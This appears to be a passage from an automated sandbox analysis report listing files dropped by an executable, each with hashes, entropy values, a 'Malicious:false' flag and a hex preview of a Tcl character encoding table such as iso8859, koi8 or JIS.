                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-4, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040138015600A40128013B00A700A8016001120122016600AD017D00AF..00B0010502DB015700B40129013C02C700B80161011301230167014A017E014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE012A..01100145014C013600D400D500D600D700D8017200DA00DB00DC0168016A00DF..010100E100E200E300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.342721205983665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zHVBUlJvRj7SOVbusZhAMiZyi77qimq5+SAJlz9aRme3cJbx:zMlBVnrAMiwMmTqeYnsJbx
                                                                                                                                                                                                                              MD5:6FBEFDC3DEC612B7B2CC903D8C53F45B
                                                                                                                                                                                                                              SHA1:14EC3C166DC411149C32C262DBE8E327F6186669
                                                                                                                                                                                                                              SHA-256:3130BF26DA0C840C1E02203A90C3B1C38966FB203130E2FBB3DD7CB3865A3539
                                                                                                                                                                                                                              SHA-512:F3F15AD8B6C9D9B4C9C994FE3235B4463E59BE7DCE79CF3F7AA77905D6F4DC2C4AABB79B440767DB13D357B13F09EA34983FCA7BC92D0AFA15FB6CBEDDD04E38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-5, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0040104020403040404050406040704080409040A040B040C00AD040E040F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..044004410442044304
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):2.992219341429816
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YHVBUlJvRj7SOVbusZhAMiZyi77qimEZjyG/KE:YMlBVnrAMiwMmTEs6KE
                                                                                                                                                                                                                              MD5:52F025D943A45EE840D9C3DFD06E4D79
                                                                                                                                                                                                                              SHA1:571EA14B49FA6150BFD2ABA79E52799955D9FA10
                                                                                                                                                                                                                              SHA-256:CB71909BF01A3A7A4C7396359DA06D206B58A42AD68192CE37169D6640D46E13
                                                                                                                                                                                                                              SHA-512:77FF9DC785A63CA59A7D58BB25C7D2C16F364E525F9B939177385EF80F7DE37734C8774F1BC829CF0270FD66257A4D31689654C8037DB0A86A0291FFDE637B90
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-6, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000000000000000A40000000000000000000000000000060C00AD00000000..00000000000000000000000000000000000000000000061B000000000000061F..0000062106220623062406250626062706280629062A062B062C062D062E062F..0630063106320633063406350636063706380639063A00000000000000000000..064006410642064306
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.393893260854861
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TMyHVBUlJvRj7SOVbusZhAMiZyi77qim2OBHK9QQSqiWeIDDdn:TlMlBVnrAMiwMmT1hKyQSqiWeIVn
                                                                                                                                                                                                                              MD5:4BFB0A35D971A9D4C5EA8D8099E93C37
                                                                                                                                                                                                                              SHA1:8FED2CBB1343E5B4442748242B5F89A76110592D
                                                                                                                                                                                                                              SHA-256:76F6BC85FC9CB89BC3F94D36275AB23C740BA17FD36EC8907479DA3A885415EA
                                                                                                                                                                                                                              SHA-512:C9CE1E9EA57A1DEF62BBC60A115C06325C6EE8F92021695459E1ADAF1193A559BC5F0229191BFC2E344296DC137583ED4A9A61A65890F99F4CF97B3864C7AF0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-7, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A02018201900A320AC20AF00A600A700A800A9037A00AB00AC00AD00002015..00B000B100B200B303840385038600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.0494739426493567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:uHVBUlJvRj7SOVbusZhAMiZyi77qimieGlnvs26Kcv:uMlBVnrAMiwMmTirv87
                                                                                                                                                                                                                              MD5:5F69EAF54E7A1E8AC81C9E734DBE90D8
                                                                                                                                                                                                                              SHA1:BA509C88A4FC03922EF5CDC887FAA7B594A9BC5A
                                                                                                                                                                                                                              SHA-256:865E3665743B5FABA3E1AD6AA55515A666BD05DA6266879D9B66C98905DAFF3C
                                                                                                                                                                                                                              SHA-512:D9924FBE59CB571AF721CA602DBE58CAD0D9310610EDF544F8FC0FBF3D1CE4E99597D0198E4E7C802107012786346FE4C1B9C6C3A76D5F60B9A83981B0EDA24D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-8, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0000000A200A300A400A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000002017..05D005D105D205D305
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.2591070910715714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:XHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkBSMH+tA/b:XMlBVnrAMiwMmTmokgzAD
                                                                                                                                                                                                                              MD5:0B99E605E73B7D8DEFD8D643F5729748
                                                                                                                                                                                                                              SHA1:F30E7CCBCD9C539126E8D6CA0886E4B2BD54E05D
                                                                                                                                                                                                                              SHA-256:CF51E867DDE2F19553D98FEEC45A075C4B4F480FB1EDADB3D8DAD1EBEA9299F3
                                                                                                                                                                                                                              SHA-512:DA0487CD7F2143195E80697C17FFDB61AFD464C888DDF84813B2B5D1BAB24D96466DA7A7F77C8E4A9D0D53F34D72928923380AFC1B92A96C0A3BFF46006A4E19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-9, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.2708615484795676
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zBHVBUlJvRj7SOVbusZhAMiZyi77qN8VmKfkiJt0RMFS:zBMlBVnrAMiwMmNPYPFS
                                                                                                                                                                                                                              MD5:4E21F24F8D9CC5DF16B29CACD997AC69
                                                                                                                                                                                                                              SHA1:064E723EFB82EF1C303E5267496304288821E404
                                                                                                                                                                                                                              SHA-256:61B14A7C312366F79BB45F02C6B7EE362E6F51CBAD5E479E563C7F7E785DB654
                                                                                                                                                                                                                              SHA-512:AF8FAEB47EFB51F2537139F7C4254ABED119E477FD2B5E83B90B7A903B43C4E02DDF43A7DDB044A0A9601E9F9ADE91B02EE7C0EC87FF5DDCF9951B9601A90435
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: jis0201, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..00000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81772
                                                                                                                                                                                                                              Entropy (8bit):2.3571626869060776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:AigXM6CwL/9pV7Hl6+Yko9gZxErA3/MS/8xqg8:AZ/tp1Hl2KZxUfr8
                                                                                                                                                                                                                              MD5:F0661E22C7455994AA1F6EC1EDA401B4
                                                                                                                                                                                                                              SHA1:928B2AC46A9FDE61A81F56BE225E6138B40C22E5
                                                                                                                                                                                                                              SHA-256:F6B1C6AC5F5FC4E990A7A1AAC16A406012040936431BEFE7D2B6CD1DA9E422C4
                                                                                                                                                                                                                              SHA-512:917CC58678A9E9F5CBE860D30828846ABA4EA8CDFAB7DD1AE6A66C47ECBB85CF67DD97BC3E6F95341DD30F4E757B2CEA571708D5B4CED18A29F19904C3138AE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: jis0208, double-byte..D..2129 0 77..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8..FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F..FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D..FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7..00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5..FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):72133
                                                                                                                                                                                                                              Entropy (8bit):2.3455261548208055
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:9F/D7CH2puD5CdzU3nAkP5dHn7s391fmOarFaVQ:H/D7CHbozU3nAk3H7sXm3FgQ
                                                                                                                                                                                                                              MD5:07CE2C135BE17DBAFA558AA5949A53DB
                                                                                                                                                                                                                              SHA1:5D9DBEFCCB44E76C1A4E61360C6FCED8DCC8EF4D
                                                                                                                                                                                                                              SHA-256:785CFC5F5D9CB06DB8061730AB0016A0F70D0B59F6787D2A3CBB8D5779C99706
                                                                                                                                                                                                                              SHA-512:E954D7198D58ACEDEB4C8E5F466107767C3DA43763A5F6CDDFCF567226F9B22B4C2DE27564F28CD125D7F1BA7CB9C6DE6DEC4065EC2676572C793BE458FDDD9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: jis0212, double-byte..D..2244 0 68..22..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000000000000000000000000000000000000000002D8..02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000..0000000000A100A600BF00000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000BA00AA00A900AE2122..00A4211600000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.531149521168141
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KcJ5mHVBUlJvRj7SOVbusZhAMiZyi77qpSzIa9qVRS3YcEchJh3MAxSl:KmmMlBVnrAMiwMmAzIxVgBE6cAxQ
                                                                                                                                                                                                                              MD5:96F54CC639ACA8E466FB8058144C9350
                                                                                                                                                                                                                              SHA1:0B9530D6080F2BAACABD5AA0D48BFF316FCCEF64
                                                                                                                                                                                                                              SHA-256:0E43244BFC4F33FACB844B9E00270A1A4C24DC59B8A9B95104E2D788BB2F59FD
                                                                                                                                                                                                                              SHA-512:5B7859325E5E34C9D4558B1198795BB9C6A8EF783EB97193EA80BA76C38AFE9BDD1B526B77401DF5456B7A0E85E942191FFD4B4F2B9F0C8168A7093EE452802E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: koi8-r, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204512553255425552556255725582559255A255B255C255D255E..255F25602561040125622563256425652566256725682569256A256B256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.5076564572101714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:K+HVBUlJvRj7SOVbusZhAMiZyi77qpSzIaU3dmVRS3YcEchJh3MAxSl:K+MlBVnrAMiwMmAzI/EVgBE6cAxQ
                                                                                                                                                                                                                              MD5:4B755EF2288DFC4009759F8935479D68
                                                                                                                                                                                                                              SHA1:C3BDF0D9DF316DE8919DAA4329275C5AA81D61B4
                                                                                                                                                                                                                              SHA-256:ED04D5B977B8C8944D8760B713FF061292DA5634BCBB67CDFB1C3A6FF5378C81
                                                                                                                                                                                                                              SHA-512:3F1E1CC47327054FB9C54157ED10514230F10BFCD4BD9FDAFA02D7B238137DC7442CA2661B0739D8EEA3181E187D3B639A2C8118A0DE272C96000908121B6CFB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: koi8-u, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204510454255404560457255725582559255A255B0491255D255E..255F25602561040104032563040604072566256725682569256A0490256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94393
                                                                                                                                                                                                                              Entropy (8bit):2.4104200953565513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:XbjO7Uw6uKdosXRxps9a+ut/BmZPwkpT9A0T03o:XfO4ZBRxpV+4wPwKloo
                                                                                                                                                                                                                              MD5:366C09E4A4CC10006E593F5B3F3461D7
                                                                                                                                                                                                                              SHA1:A0DABFBEEB66E26FB342844EA41772D7A1D19C24
                                                                                                                                                                                                                              SHA-256:9B27FE7E7054F36E279993F19E52E18AC03360D117AE80C42B4E984A97C590AA
                                                                                                                                                                                                                              SHA-512:670F32D698C7992038E736D3AD40098D8589C0C5A1379E32A0F02A02FAF251B1312CAD131DDADC3F80B23A3821A91689F2E310309028BDDDF227D532EB505A20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: ksc5601, double-byte..D..233F 0 89..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300200B72025202600A8300300AD20152225FF3C223C20182019..201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7..00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640..222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6..25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D..221D2235222B222C2208220B2286228722822283222A222922272228FFE20000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.4295694929963667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8jHVBUlJvRj7SOVbusZhAMiZyi77qHVPJSf2FcVDu1LEe4qPPMl2J89:8jMlBVnrAMiwMmHEmJ4IMgi9
                                                                                                                                                                                                                              MD5:10850BCFB943318284D6191494EBD7D5
                                                                                                                                                                                                                              SHA1:237D5DDF7969A422991F17021244D13A2BB0DE92
                                                                                                                                                                                                                              SHA-256:81ECA6840B87F2DEF9FCDD171A55C2D71A49386D88401CE927AE57D7DDD7AAAA
                                                                                                                                                                                                                              SHA-512:D797781C228B70D2D83DB8ABA08F840CE49846C9473CC89A2E316900D9E08A63142E68AD9ABBB2EF67BF9F1D392772FAB36CCC09632022A1437AE27C11F2284F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macCentEuro, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179..017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC..202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E..012F012A22642265012B0136220222110142013B013C013D013E0139013A0145..0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C..20132014201C201D2018201900F725CA014D0154015501582039203A01590156..01570160201A201E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.3992482002374516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8ULyHVBUlJvRj7SOVbusZhAMiZyi77qsTMdKxOZwwL+KR5D/jlJy6QWky:8ULyMlBVnrAMiwMmOsL+KR5DblE85
                                                                                                                                                                                                                              MD5:A60FBDE33D13C732095713D1AB6713AB
                                                                                                                                                                                                                              SHA1:4B0EB443F2D0E4B8DB7D0435F9311E5F9A625123
                                                                                                                                                                                                                              SHA-256:BBE6F5EBB5EAB08C91DF7D524FAF39B03AA8B9F84C67ABA0553A84EC56668CB9
                                                                                                                                                                                                                              SHA-512:3EEBA6BA3FCD875AFBD5DF41EDC21E872416A48D03343232904CC99CAF913045DAF7B1A1ACD0949EF794AD7B6C9AE8F93808423FFC4B67718E732B2FF5D9B6D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macCroatian, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8..221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8..00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153..01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB..201300B7201A201E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.4178221849964903
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJY:8dMlBVnrAMiwMm8Y6zUk+UVsJY
                                                                                                                                                                                                                              MD5:C390D66441AC61CCF0A685CA5EE0BC1C
                                                                                                                                                                                                                              SHA1:FCAE825B54400B9D736EF22A613E359E3F0FA6C2
                                                                                                                                                                                                                              SHA-256:76EFE571ADDA7AED467F146CB0BD3A2351F2A720508EA0642C419F5347789CAA
                                                                                                                                                                                                                              SHA-512:C891DB15E0F600965885DE6745EDD2A4E3A6A20CA30A9AAE89CBD8C429F8455C4AF7F2FC053FB3D730D8544AB6A6E78E769DB93DAD7B29868B746FA10373F021
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
